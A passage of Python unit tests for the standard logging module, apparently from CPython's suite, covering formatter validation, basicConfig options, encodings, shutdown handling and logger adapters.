# Test $-formatting
r = self.get_record()
f = logging.Formatter('${message}', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${message}', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}--', style='$')
self.assertTrue(f.usesTime())
def test_format_validate(self):
# Check correct formatting
# Percentage style
f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
f = logging.Formatter("%(process)#+027.23X")
self.assertEqual(f._fmt, "%(process)#+027.23X")
f = logging.Formatter("%(foo)#.*g")
self.assertEqual(f._fmt, "%(foo)#.*g")
# StrFormat Style
f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
f = logging.Formatter("{customfield!s:#<30}", style="{")
self.assertEqual(f._fmt, "{customfield!s:#<30}")
f = logging.Formatter("{message!r}", style="{")
self.assertEqual(f._fmt, "{message!r}")
f = logging.Formatter("{message!s}", style="{")
self.assertEqual(f._fmt, "{message!s}")
f = logging.Formatter("{message!a}", style="{")
self.assertEqual(f._fmt, "{message!a}")
f = logging.Formatter("{process!r:4.2}", style="{")
self.assertEqual(f._fmt, "{process!r:4.2}")
f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
f = logging.Formatter("{process!s:{w},.{p}}", style="{")
self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
f = logging.Formatter("{foo:12.{p}}", style="{")
self.assertEqual(f._fmt, "{foo:12.{p}}")
f = logging.Formatter("{foo:{w}.6}", style="{")
self.assertEqual(f._fmt, "{foo:{w}.6}")
f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")
# Dollar style
f = logging.Formatter("${asctime} - $message", style="$")
self.assertEqual(f._fmt, "${asctime} - $message")
f = logging.Formatter("$bar $$", style="$")
self.assertEqual(f._fmt, "$bar $$")
f = logging.Formatter("$bar $$$$", style="$")
self.assertEqual(f._fmt, "$bar $$$$") # this would print two $($$)
# Testing when ValueError being raised from incorrect format
# Percentage Style
self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
self.assertRaises(ValueError, logging.Formatter, '{asctime}')
self.assertRaises(ValueError, logging.Formatter, '${message}')
self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f') # with both * and decimal number as precision
self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')
# StrFormat Style
# Testing failure for '-' in field name
self.assert_error_message(
ValueError,
"invalid field name/expression: 'name-thing'",
logging.Formatter, "{name-thing}", style="{"
)
# Testing failure for style mismatch
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '%(asctime)s', style='{'
)
# Testing failure for invalid conversion
self.assert_error_message(
ValueError,
"invalid conversion: 'Z'"
)
self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
self.assert_error_message(
ValueError,
"invalid format: expected ':' after conversion specifier",
logging.Formatter, '{asctime!aa:15}', style='{'
)
# Testing failure for invalid spec
self.assert_error_message(
ValueError,
"bad specifier: '.2ff'",
logging.Formatter, '{process:.2ff}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
# Testing failure for mismatch braces
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, '{process', style='{'
)
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, 'process}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')
# Dollar style
# Testing failure for mismatch bare $
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, '$bar $$$', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'bar $', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'foo $.', style='$'
)
# Testing failure for mismatch style
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '{asctime}', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')
# Testing failure for incorrect fields
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, 'foo', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
def test_default_msec_format_none(self):
class NoMsecFormatter(logging.Formatter):
default_msec_format = None
default_time_format = '%d/%m/%Y %H:%M:%S'
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 123, utc)
r.created = time.mktime(dt.astimezone(None).timetuple())
f = NoMsecFormatter()
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '21/04/1993 08:03:00')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
self.assertRaises(ValueError, logging.disable, "doesnotexists")
class _NotAnIntOrString:
pass
self.assertRaises(TypeError, logging.disable, _NotAnIntOrString())
logging.disable("WARN")
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='%(asctime)s - %(message)s')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def test_encoding(self):
try:
encoding = 'utf-8'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='strict',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data,
'The Øresund Bridge joins Copenhagen to Malmö')
def test_encoding_errors(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='ignore',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, 'The resund Bridge joins Copenhagen to Malm')
def test_encoding_errors_default(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertEqual(handler.errors, 'backslashreplace')
logging.debug('😂: ☃️: The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, r'\U0001f602: \u2603\ufe0f: The \xd8resund '
r'Bridge joins Copenhagen to Malm\xf6')
def test_encoding_errors_none(self):
# Specifying None should behave as 'strict'
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors=None,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertIsNone(handler.errors)
message = []
def dummy_handle_error(record):
_, v, _ = sys.exc_info()
message.append(str(v))
handler.handleError = dummy_handle_error
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
self.assertTrue(message)
self.assertIn("'ascii' codec can't encode "
"character '\\xd8' in position 4:", message[0])
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
# didn't write anything due to the encoding error
self.assertEqual(data, r'')
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
def innermost():
self.logger.warning('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
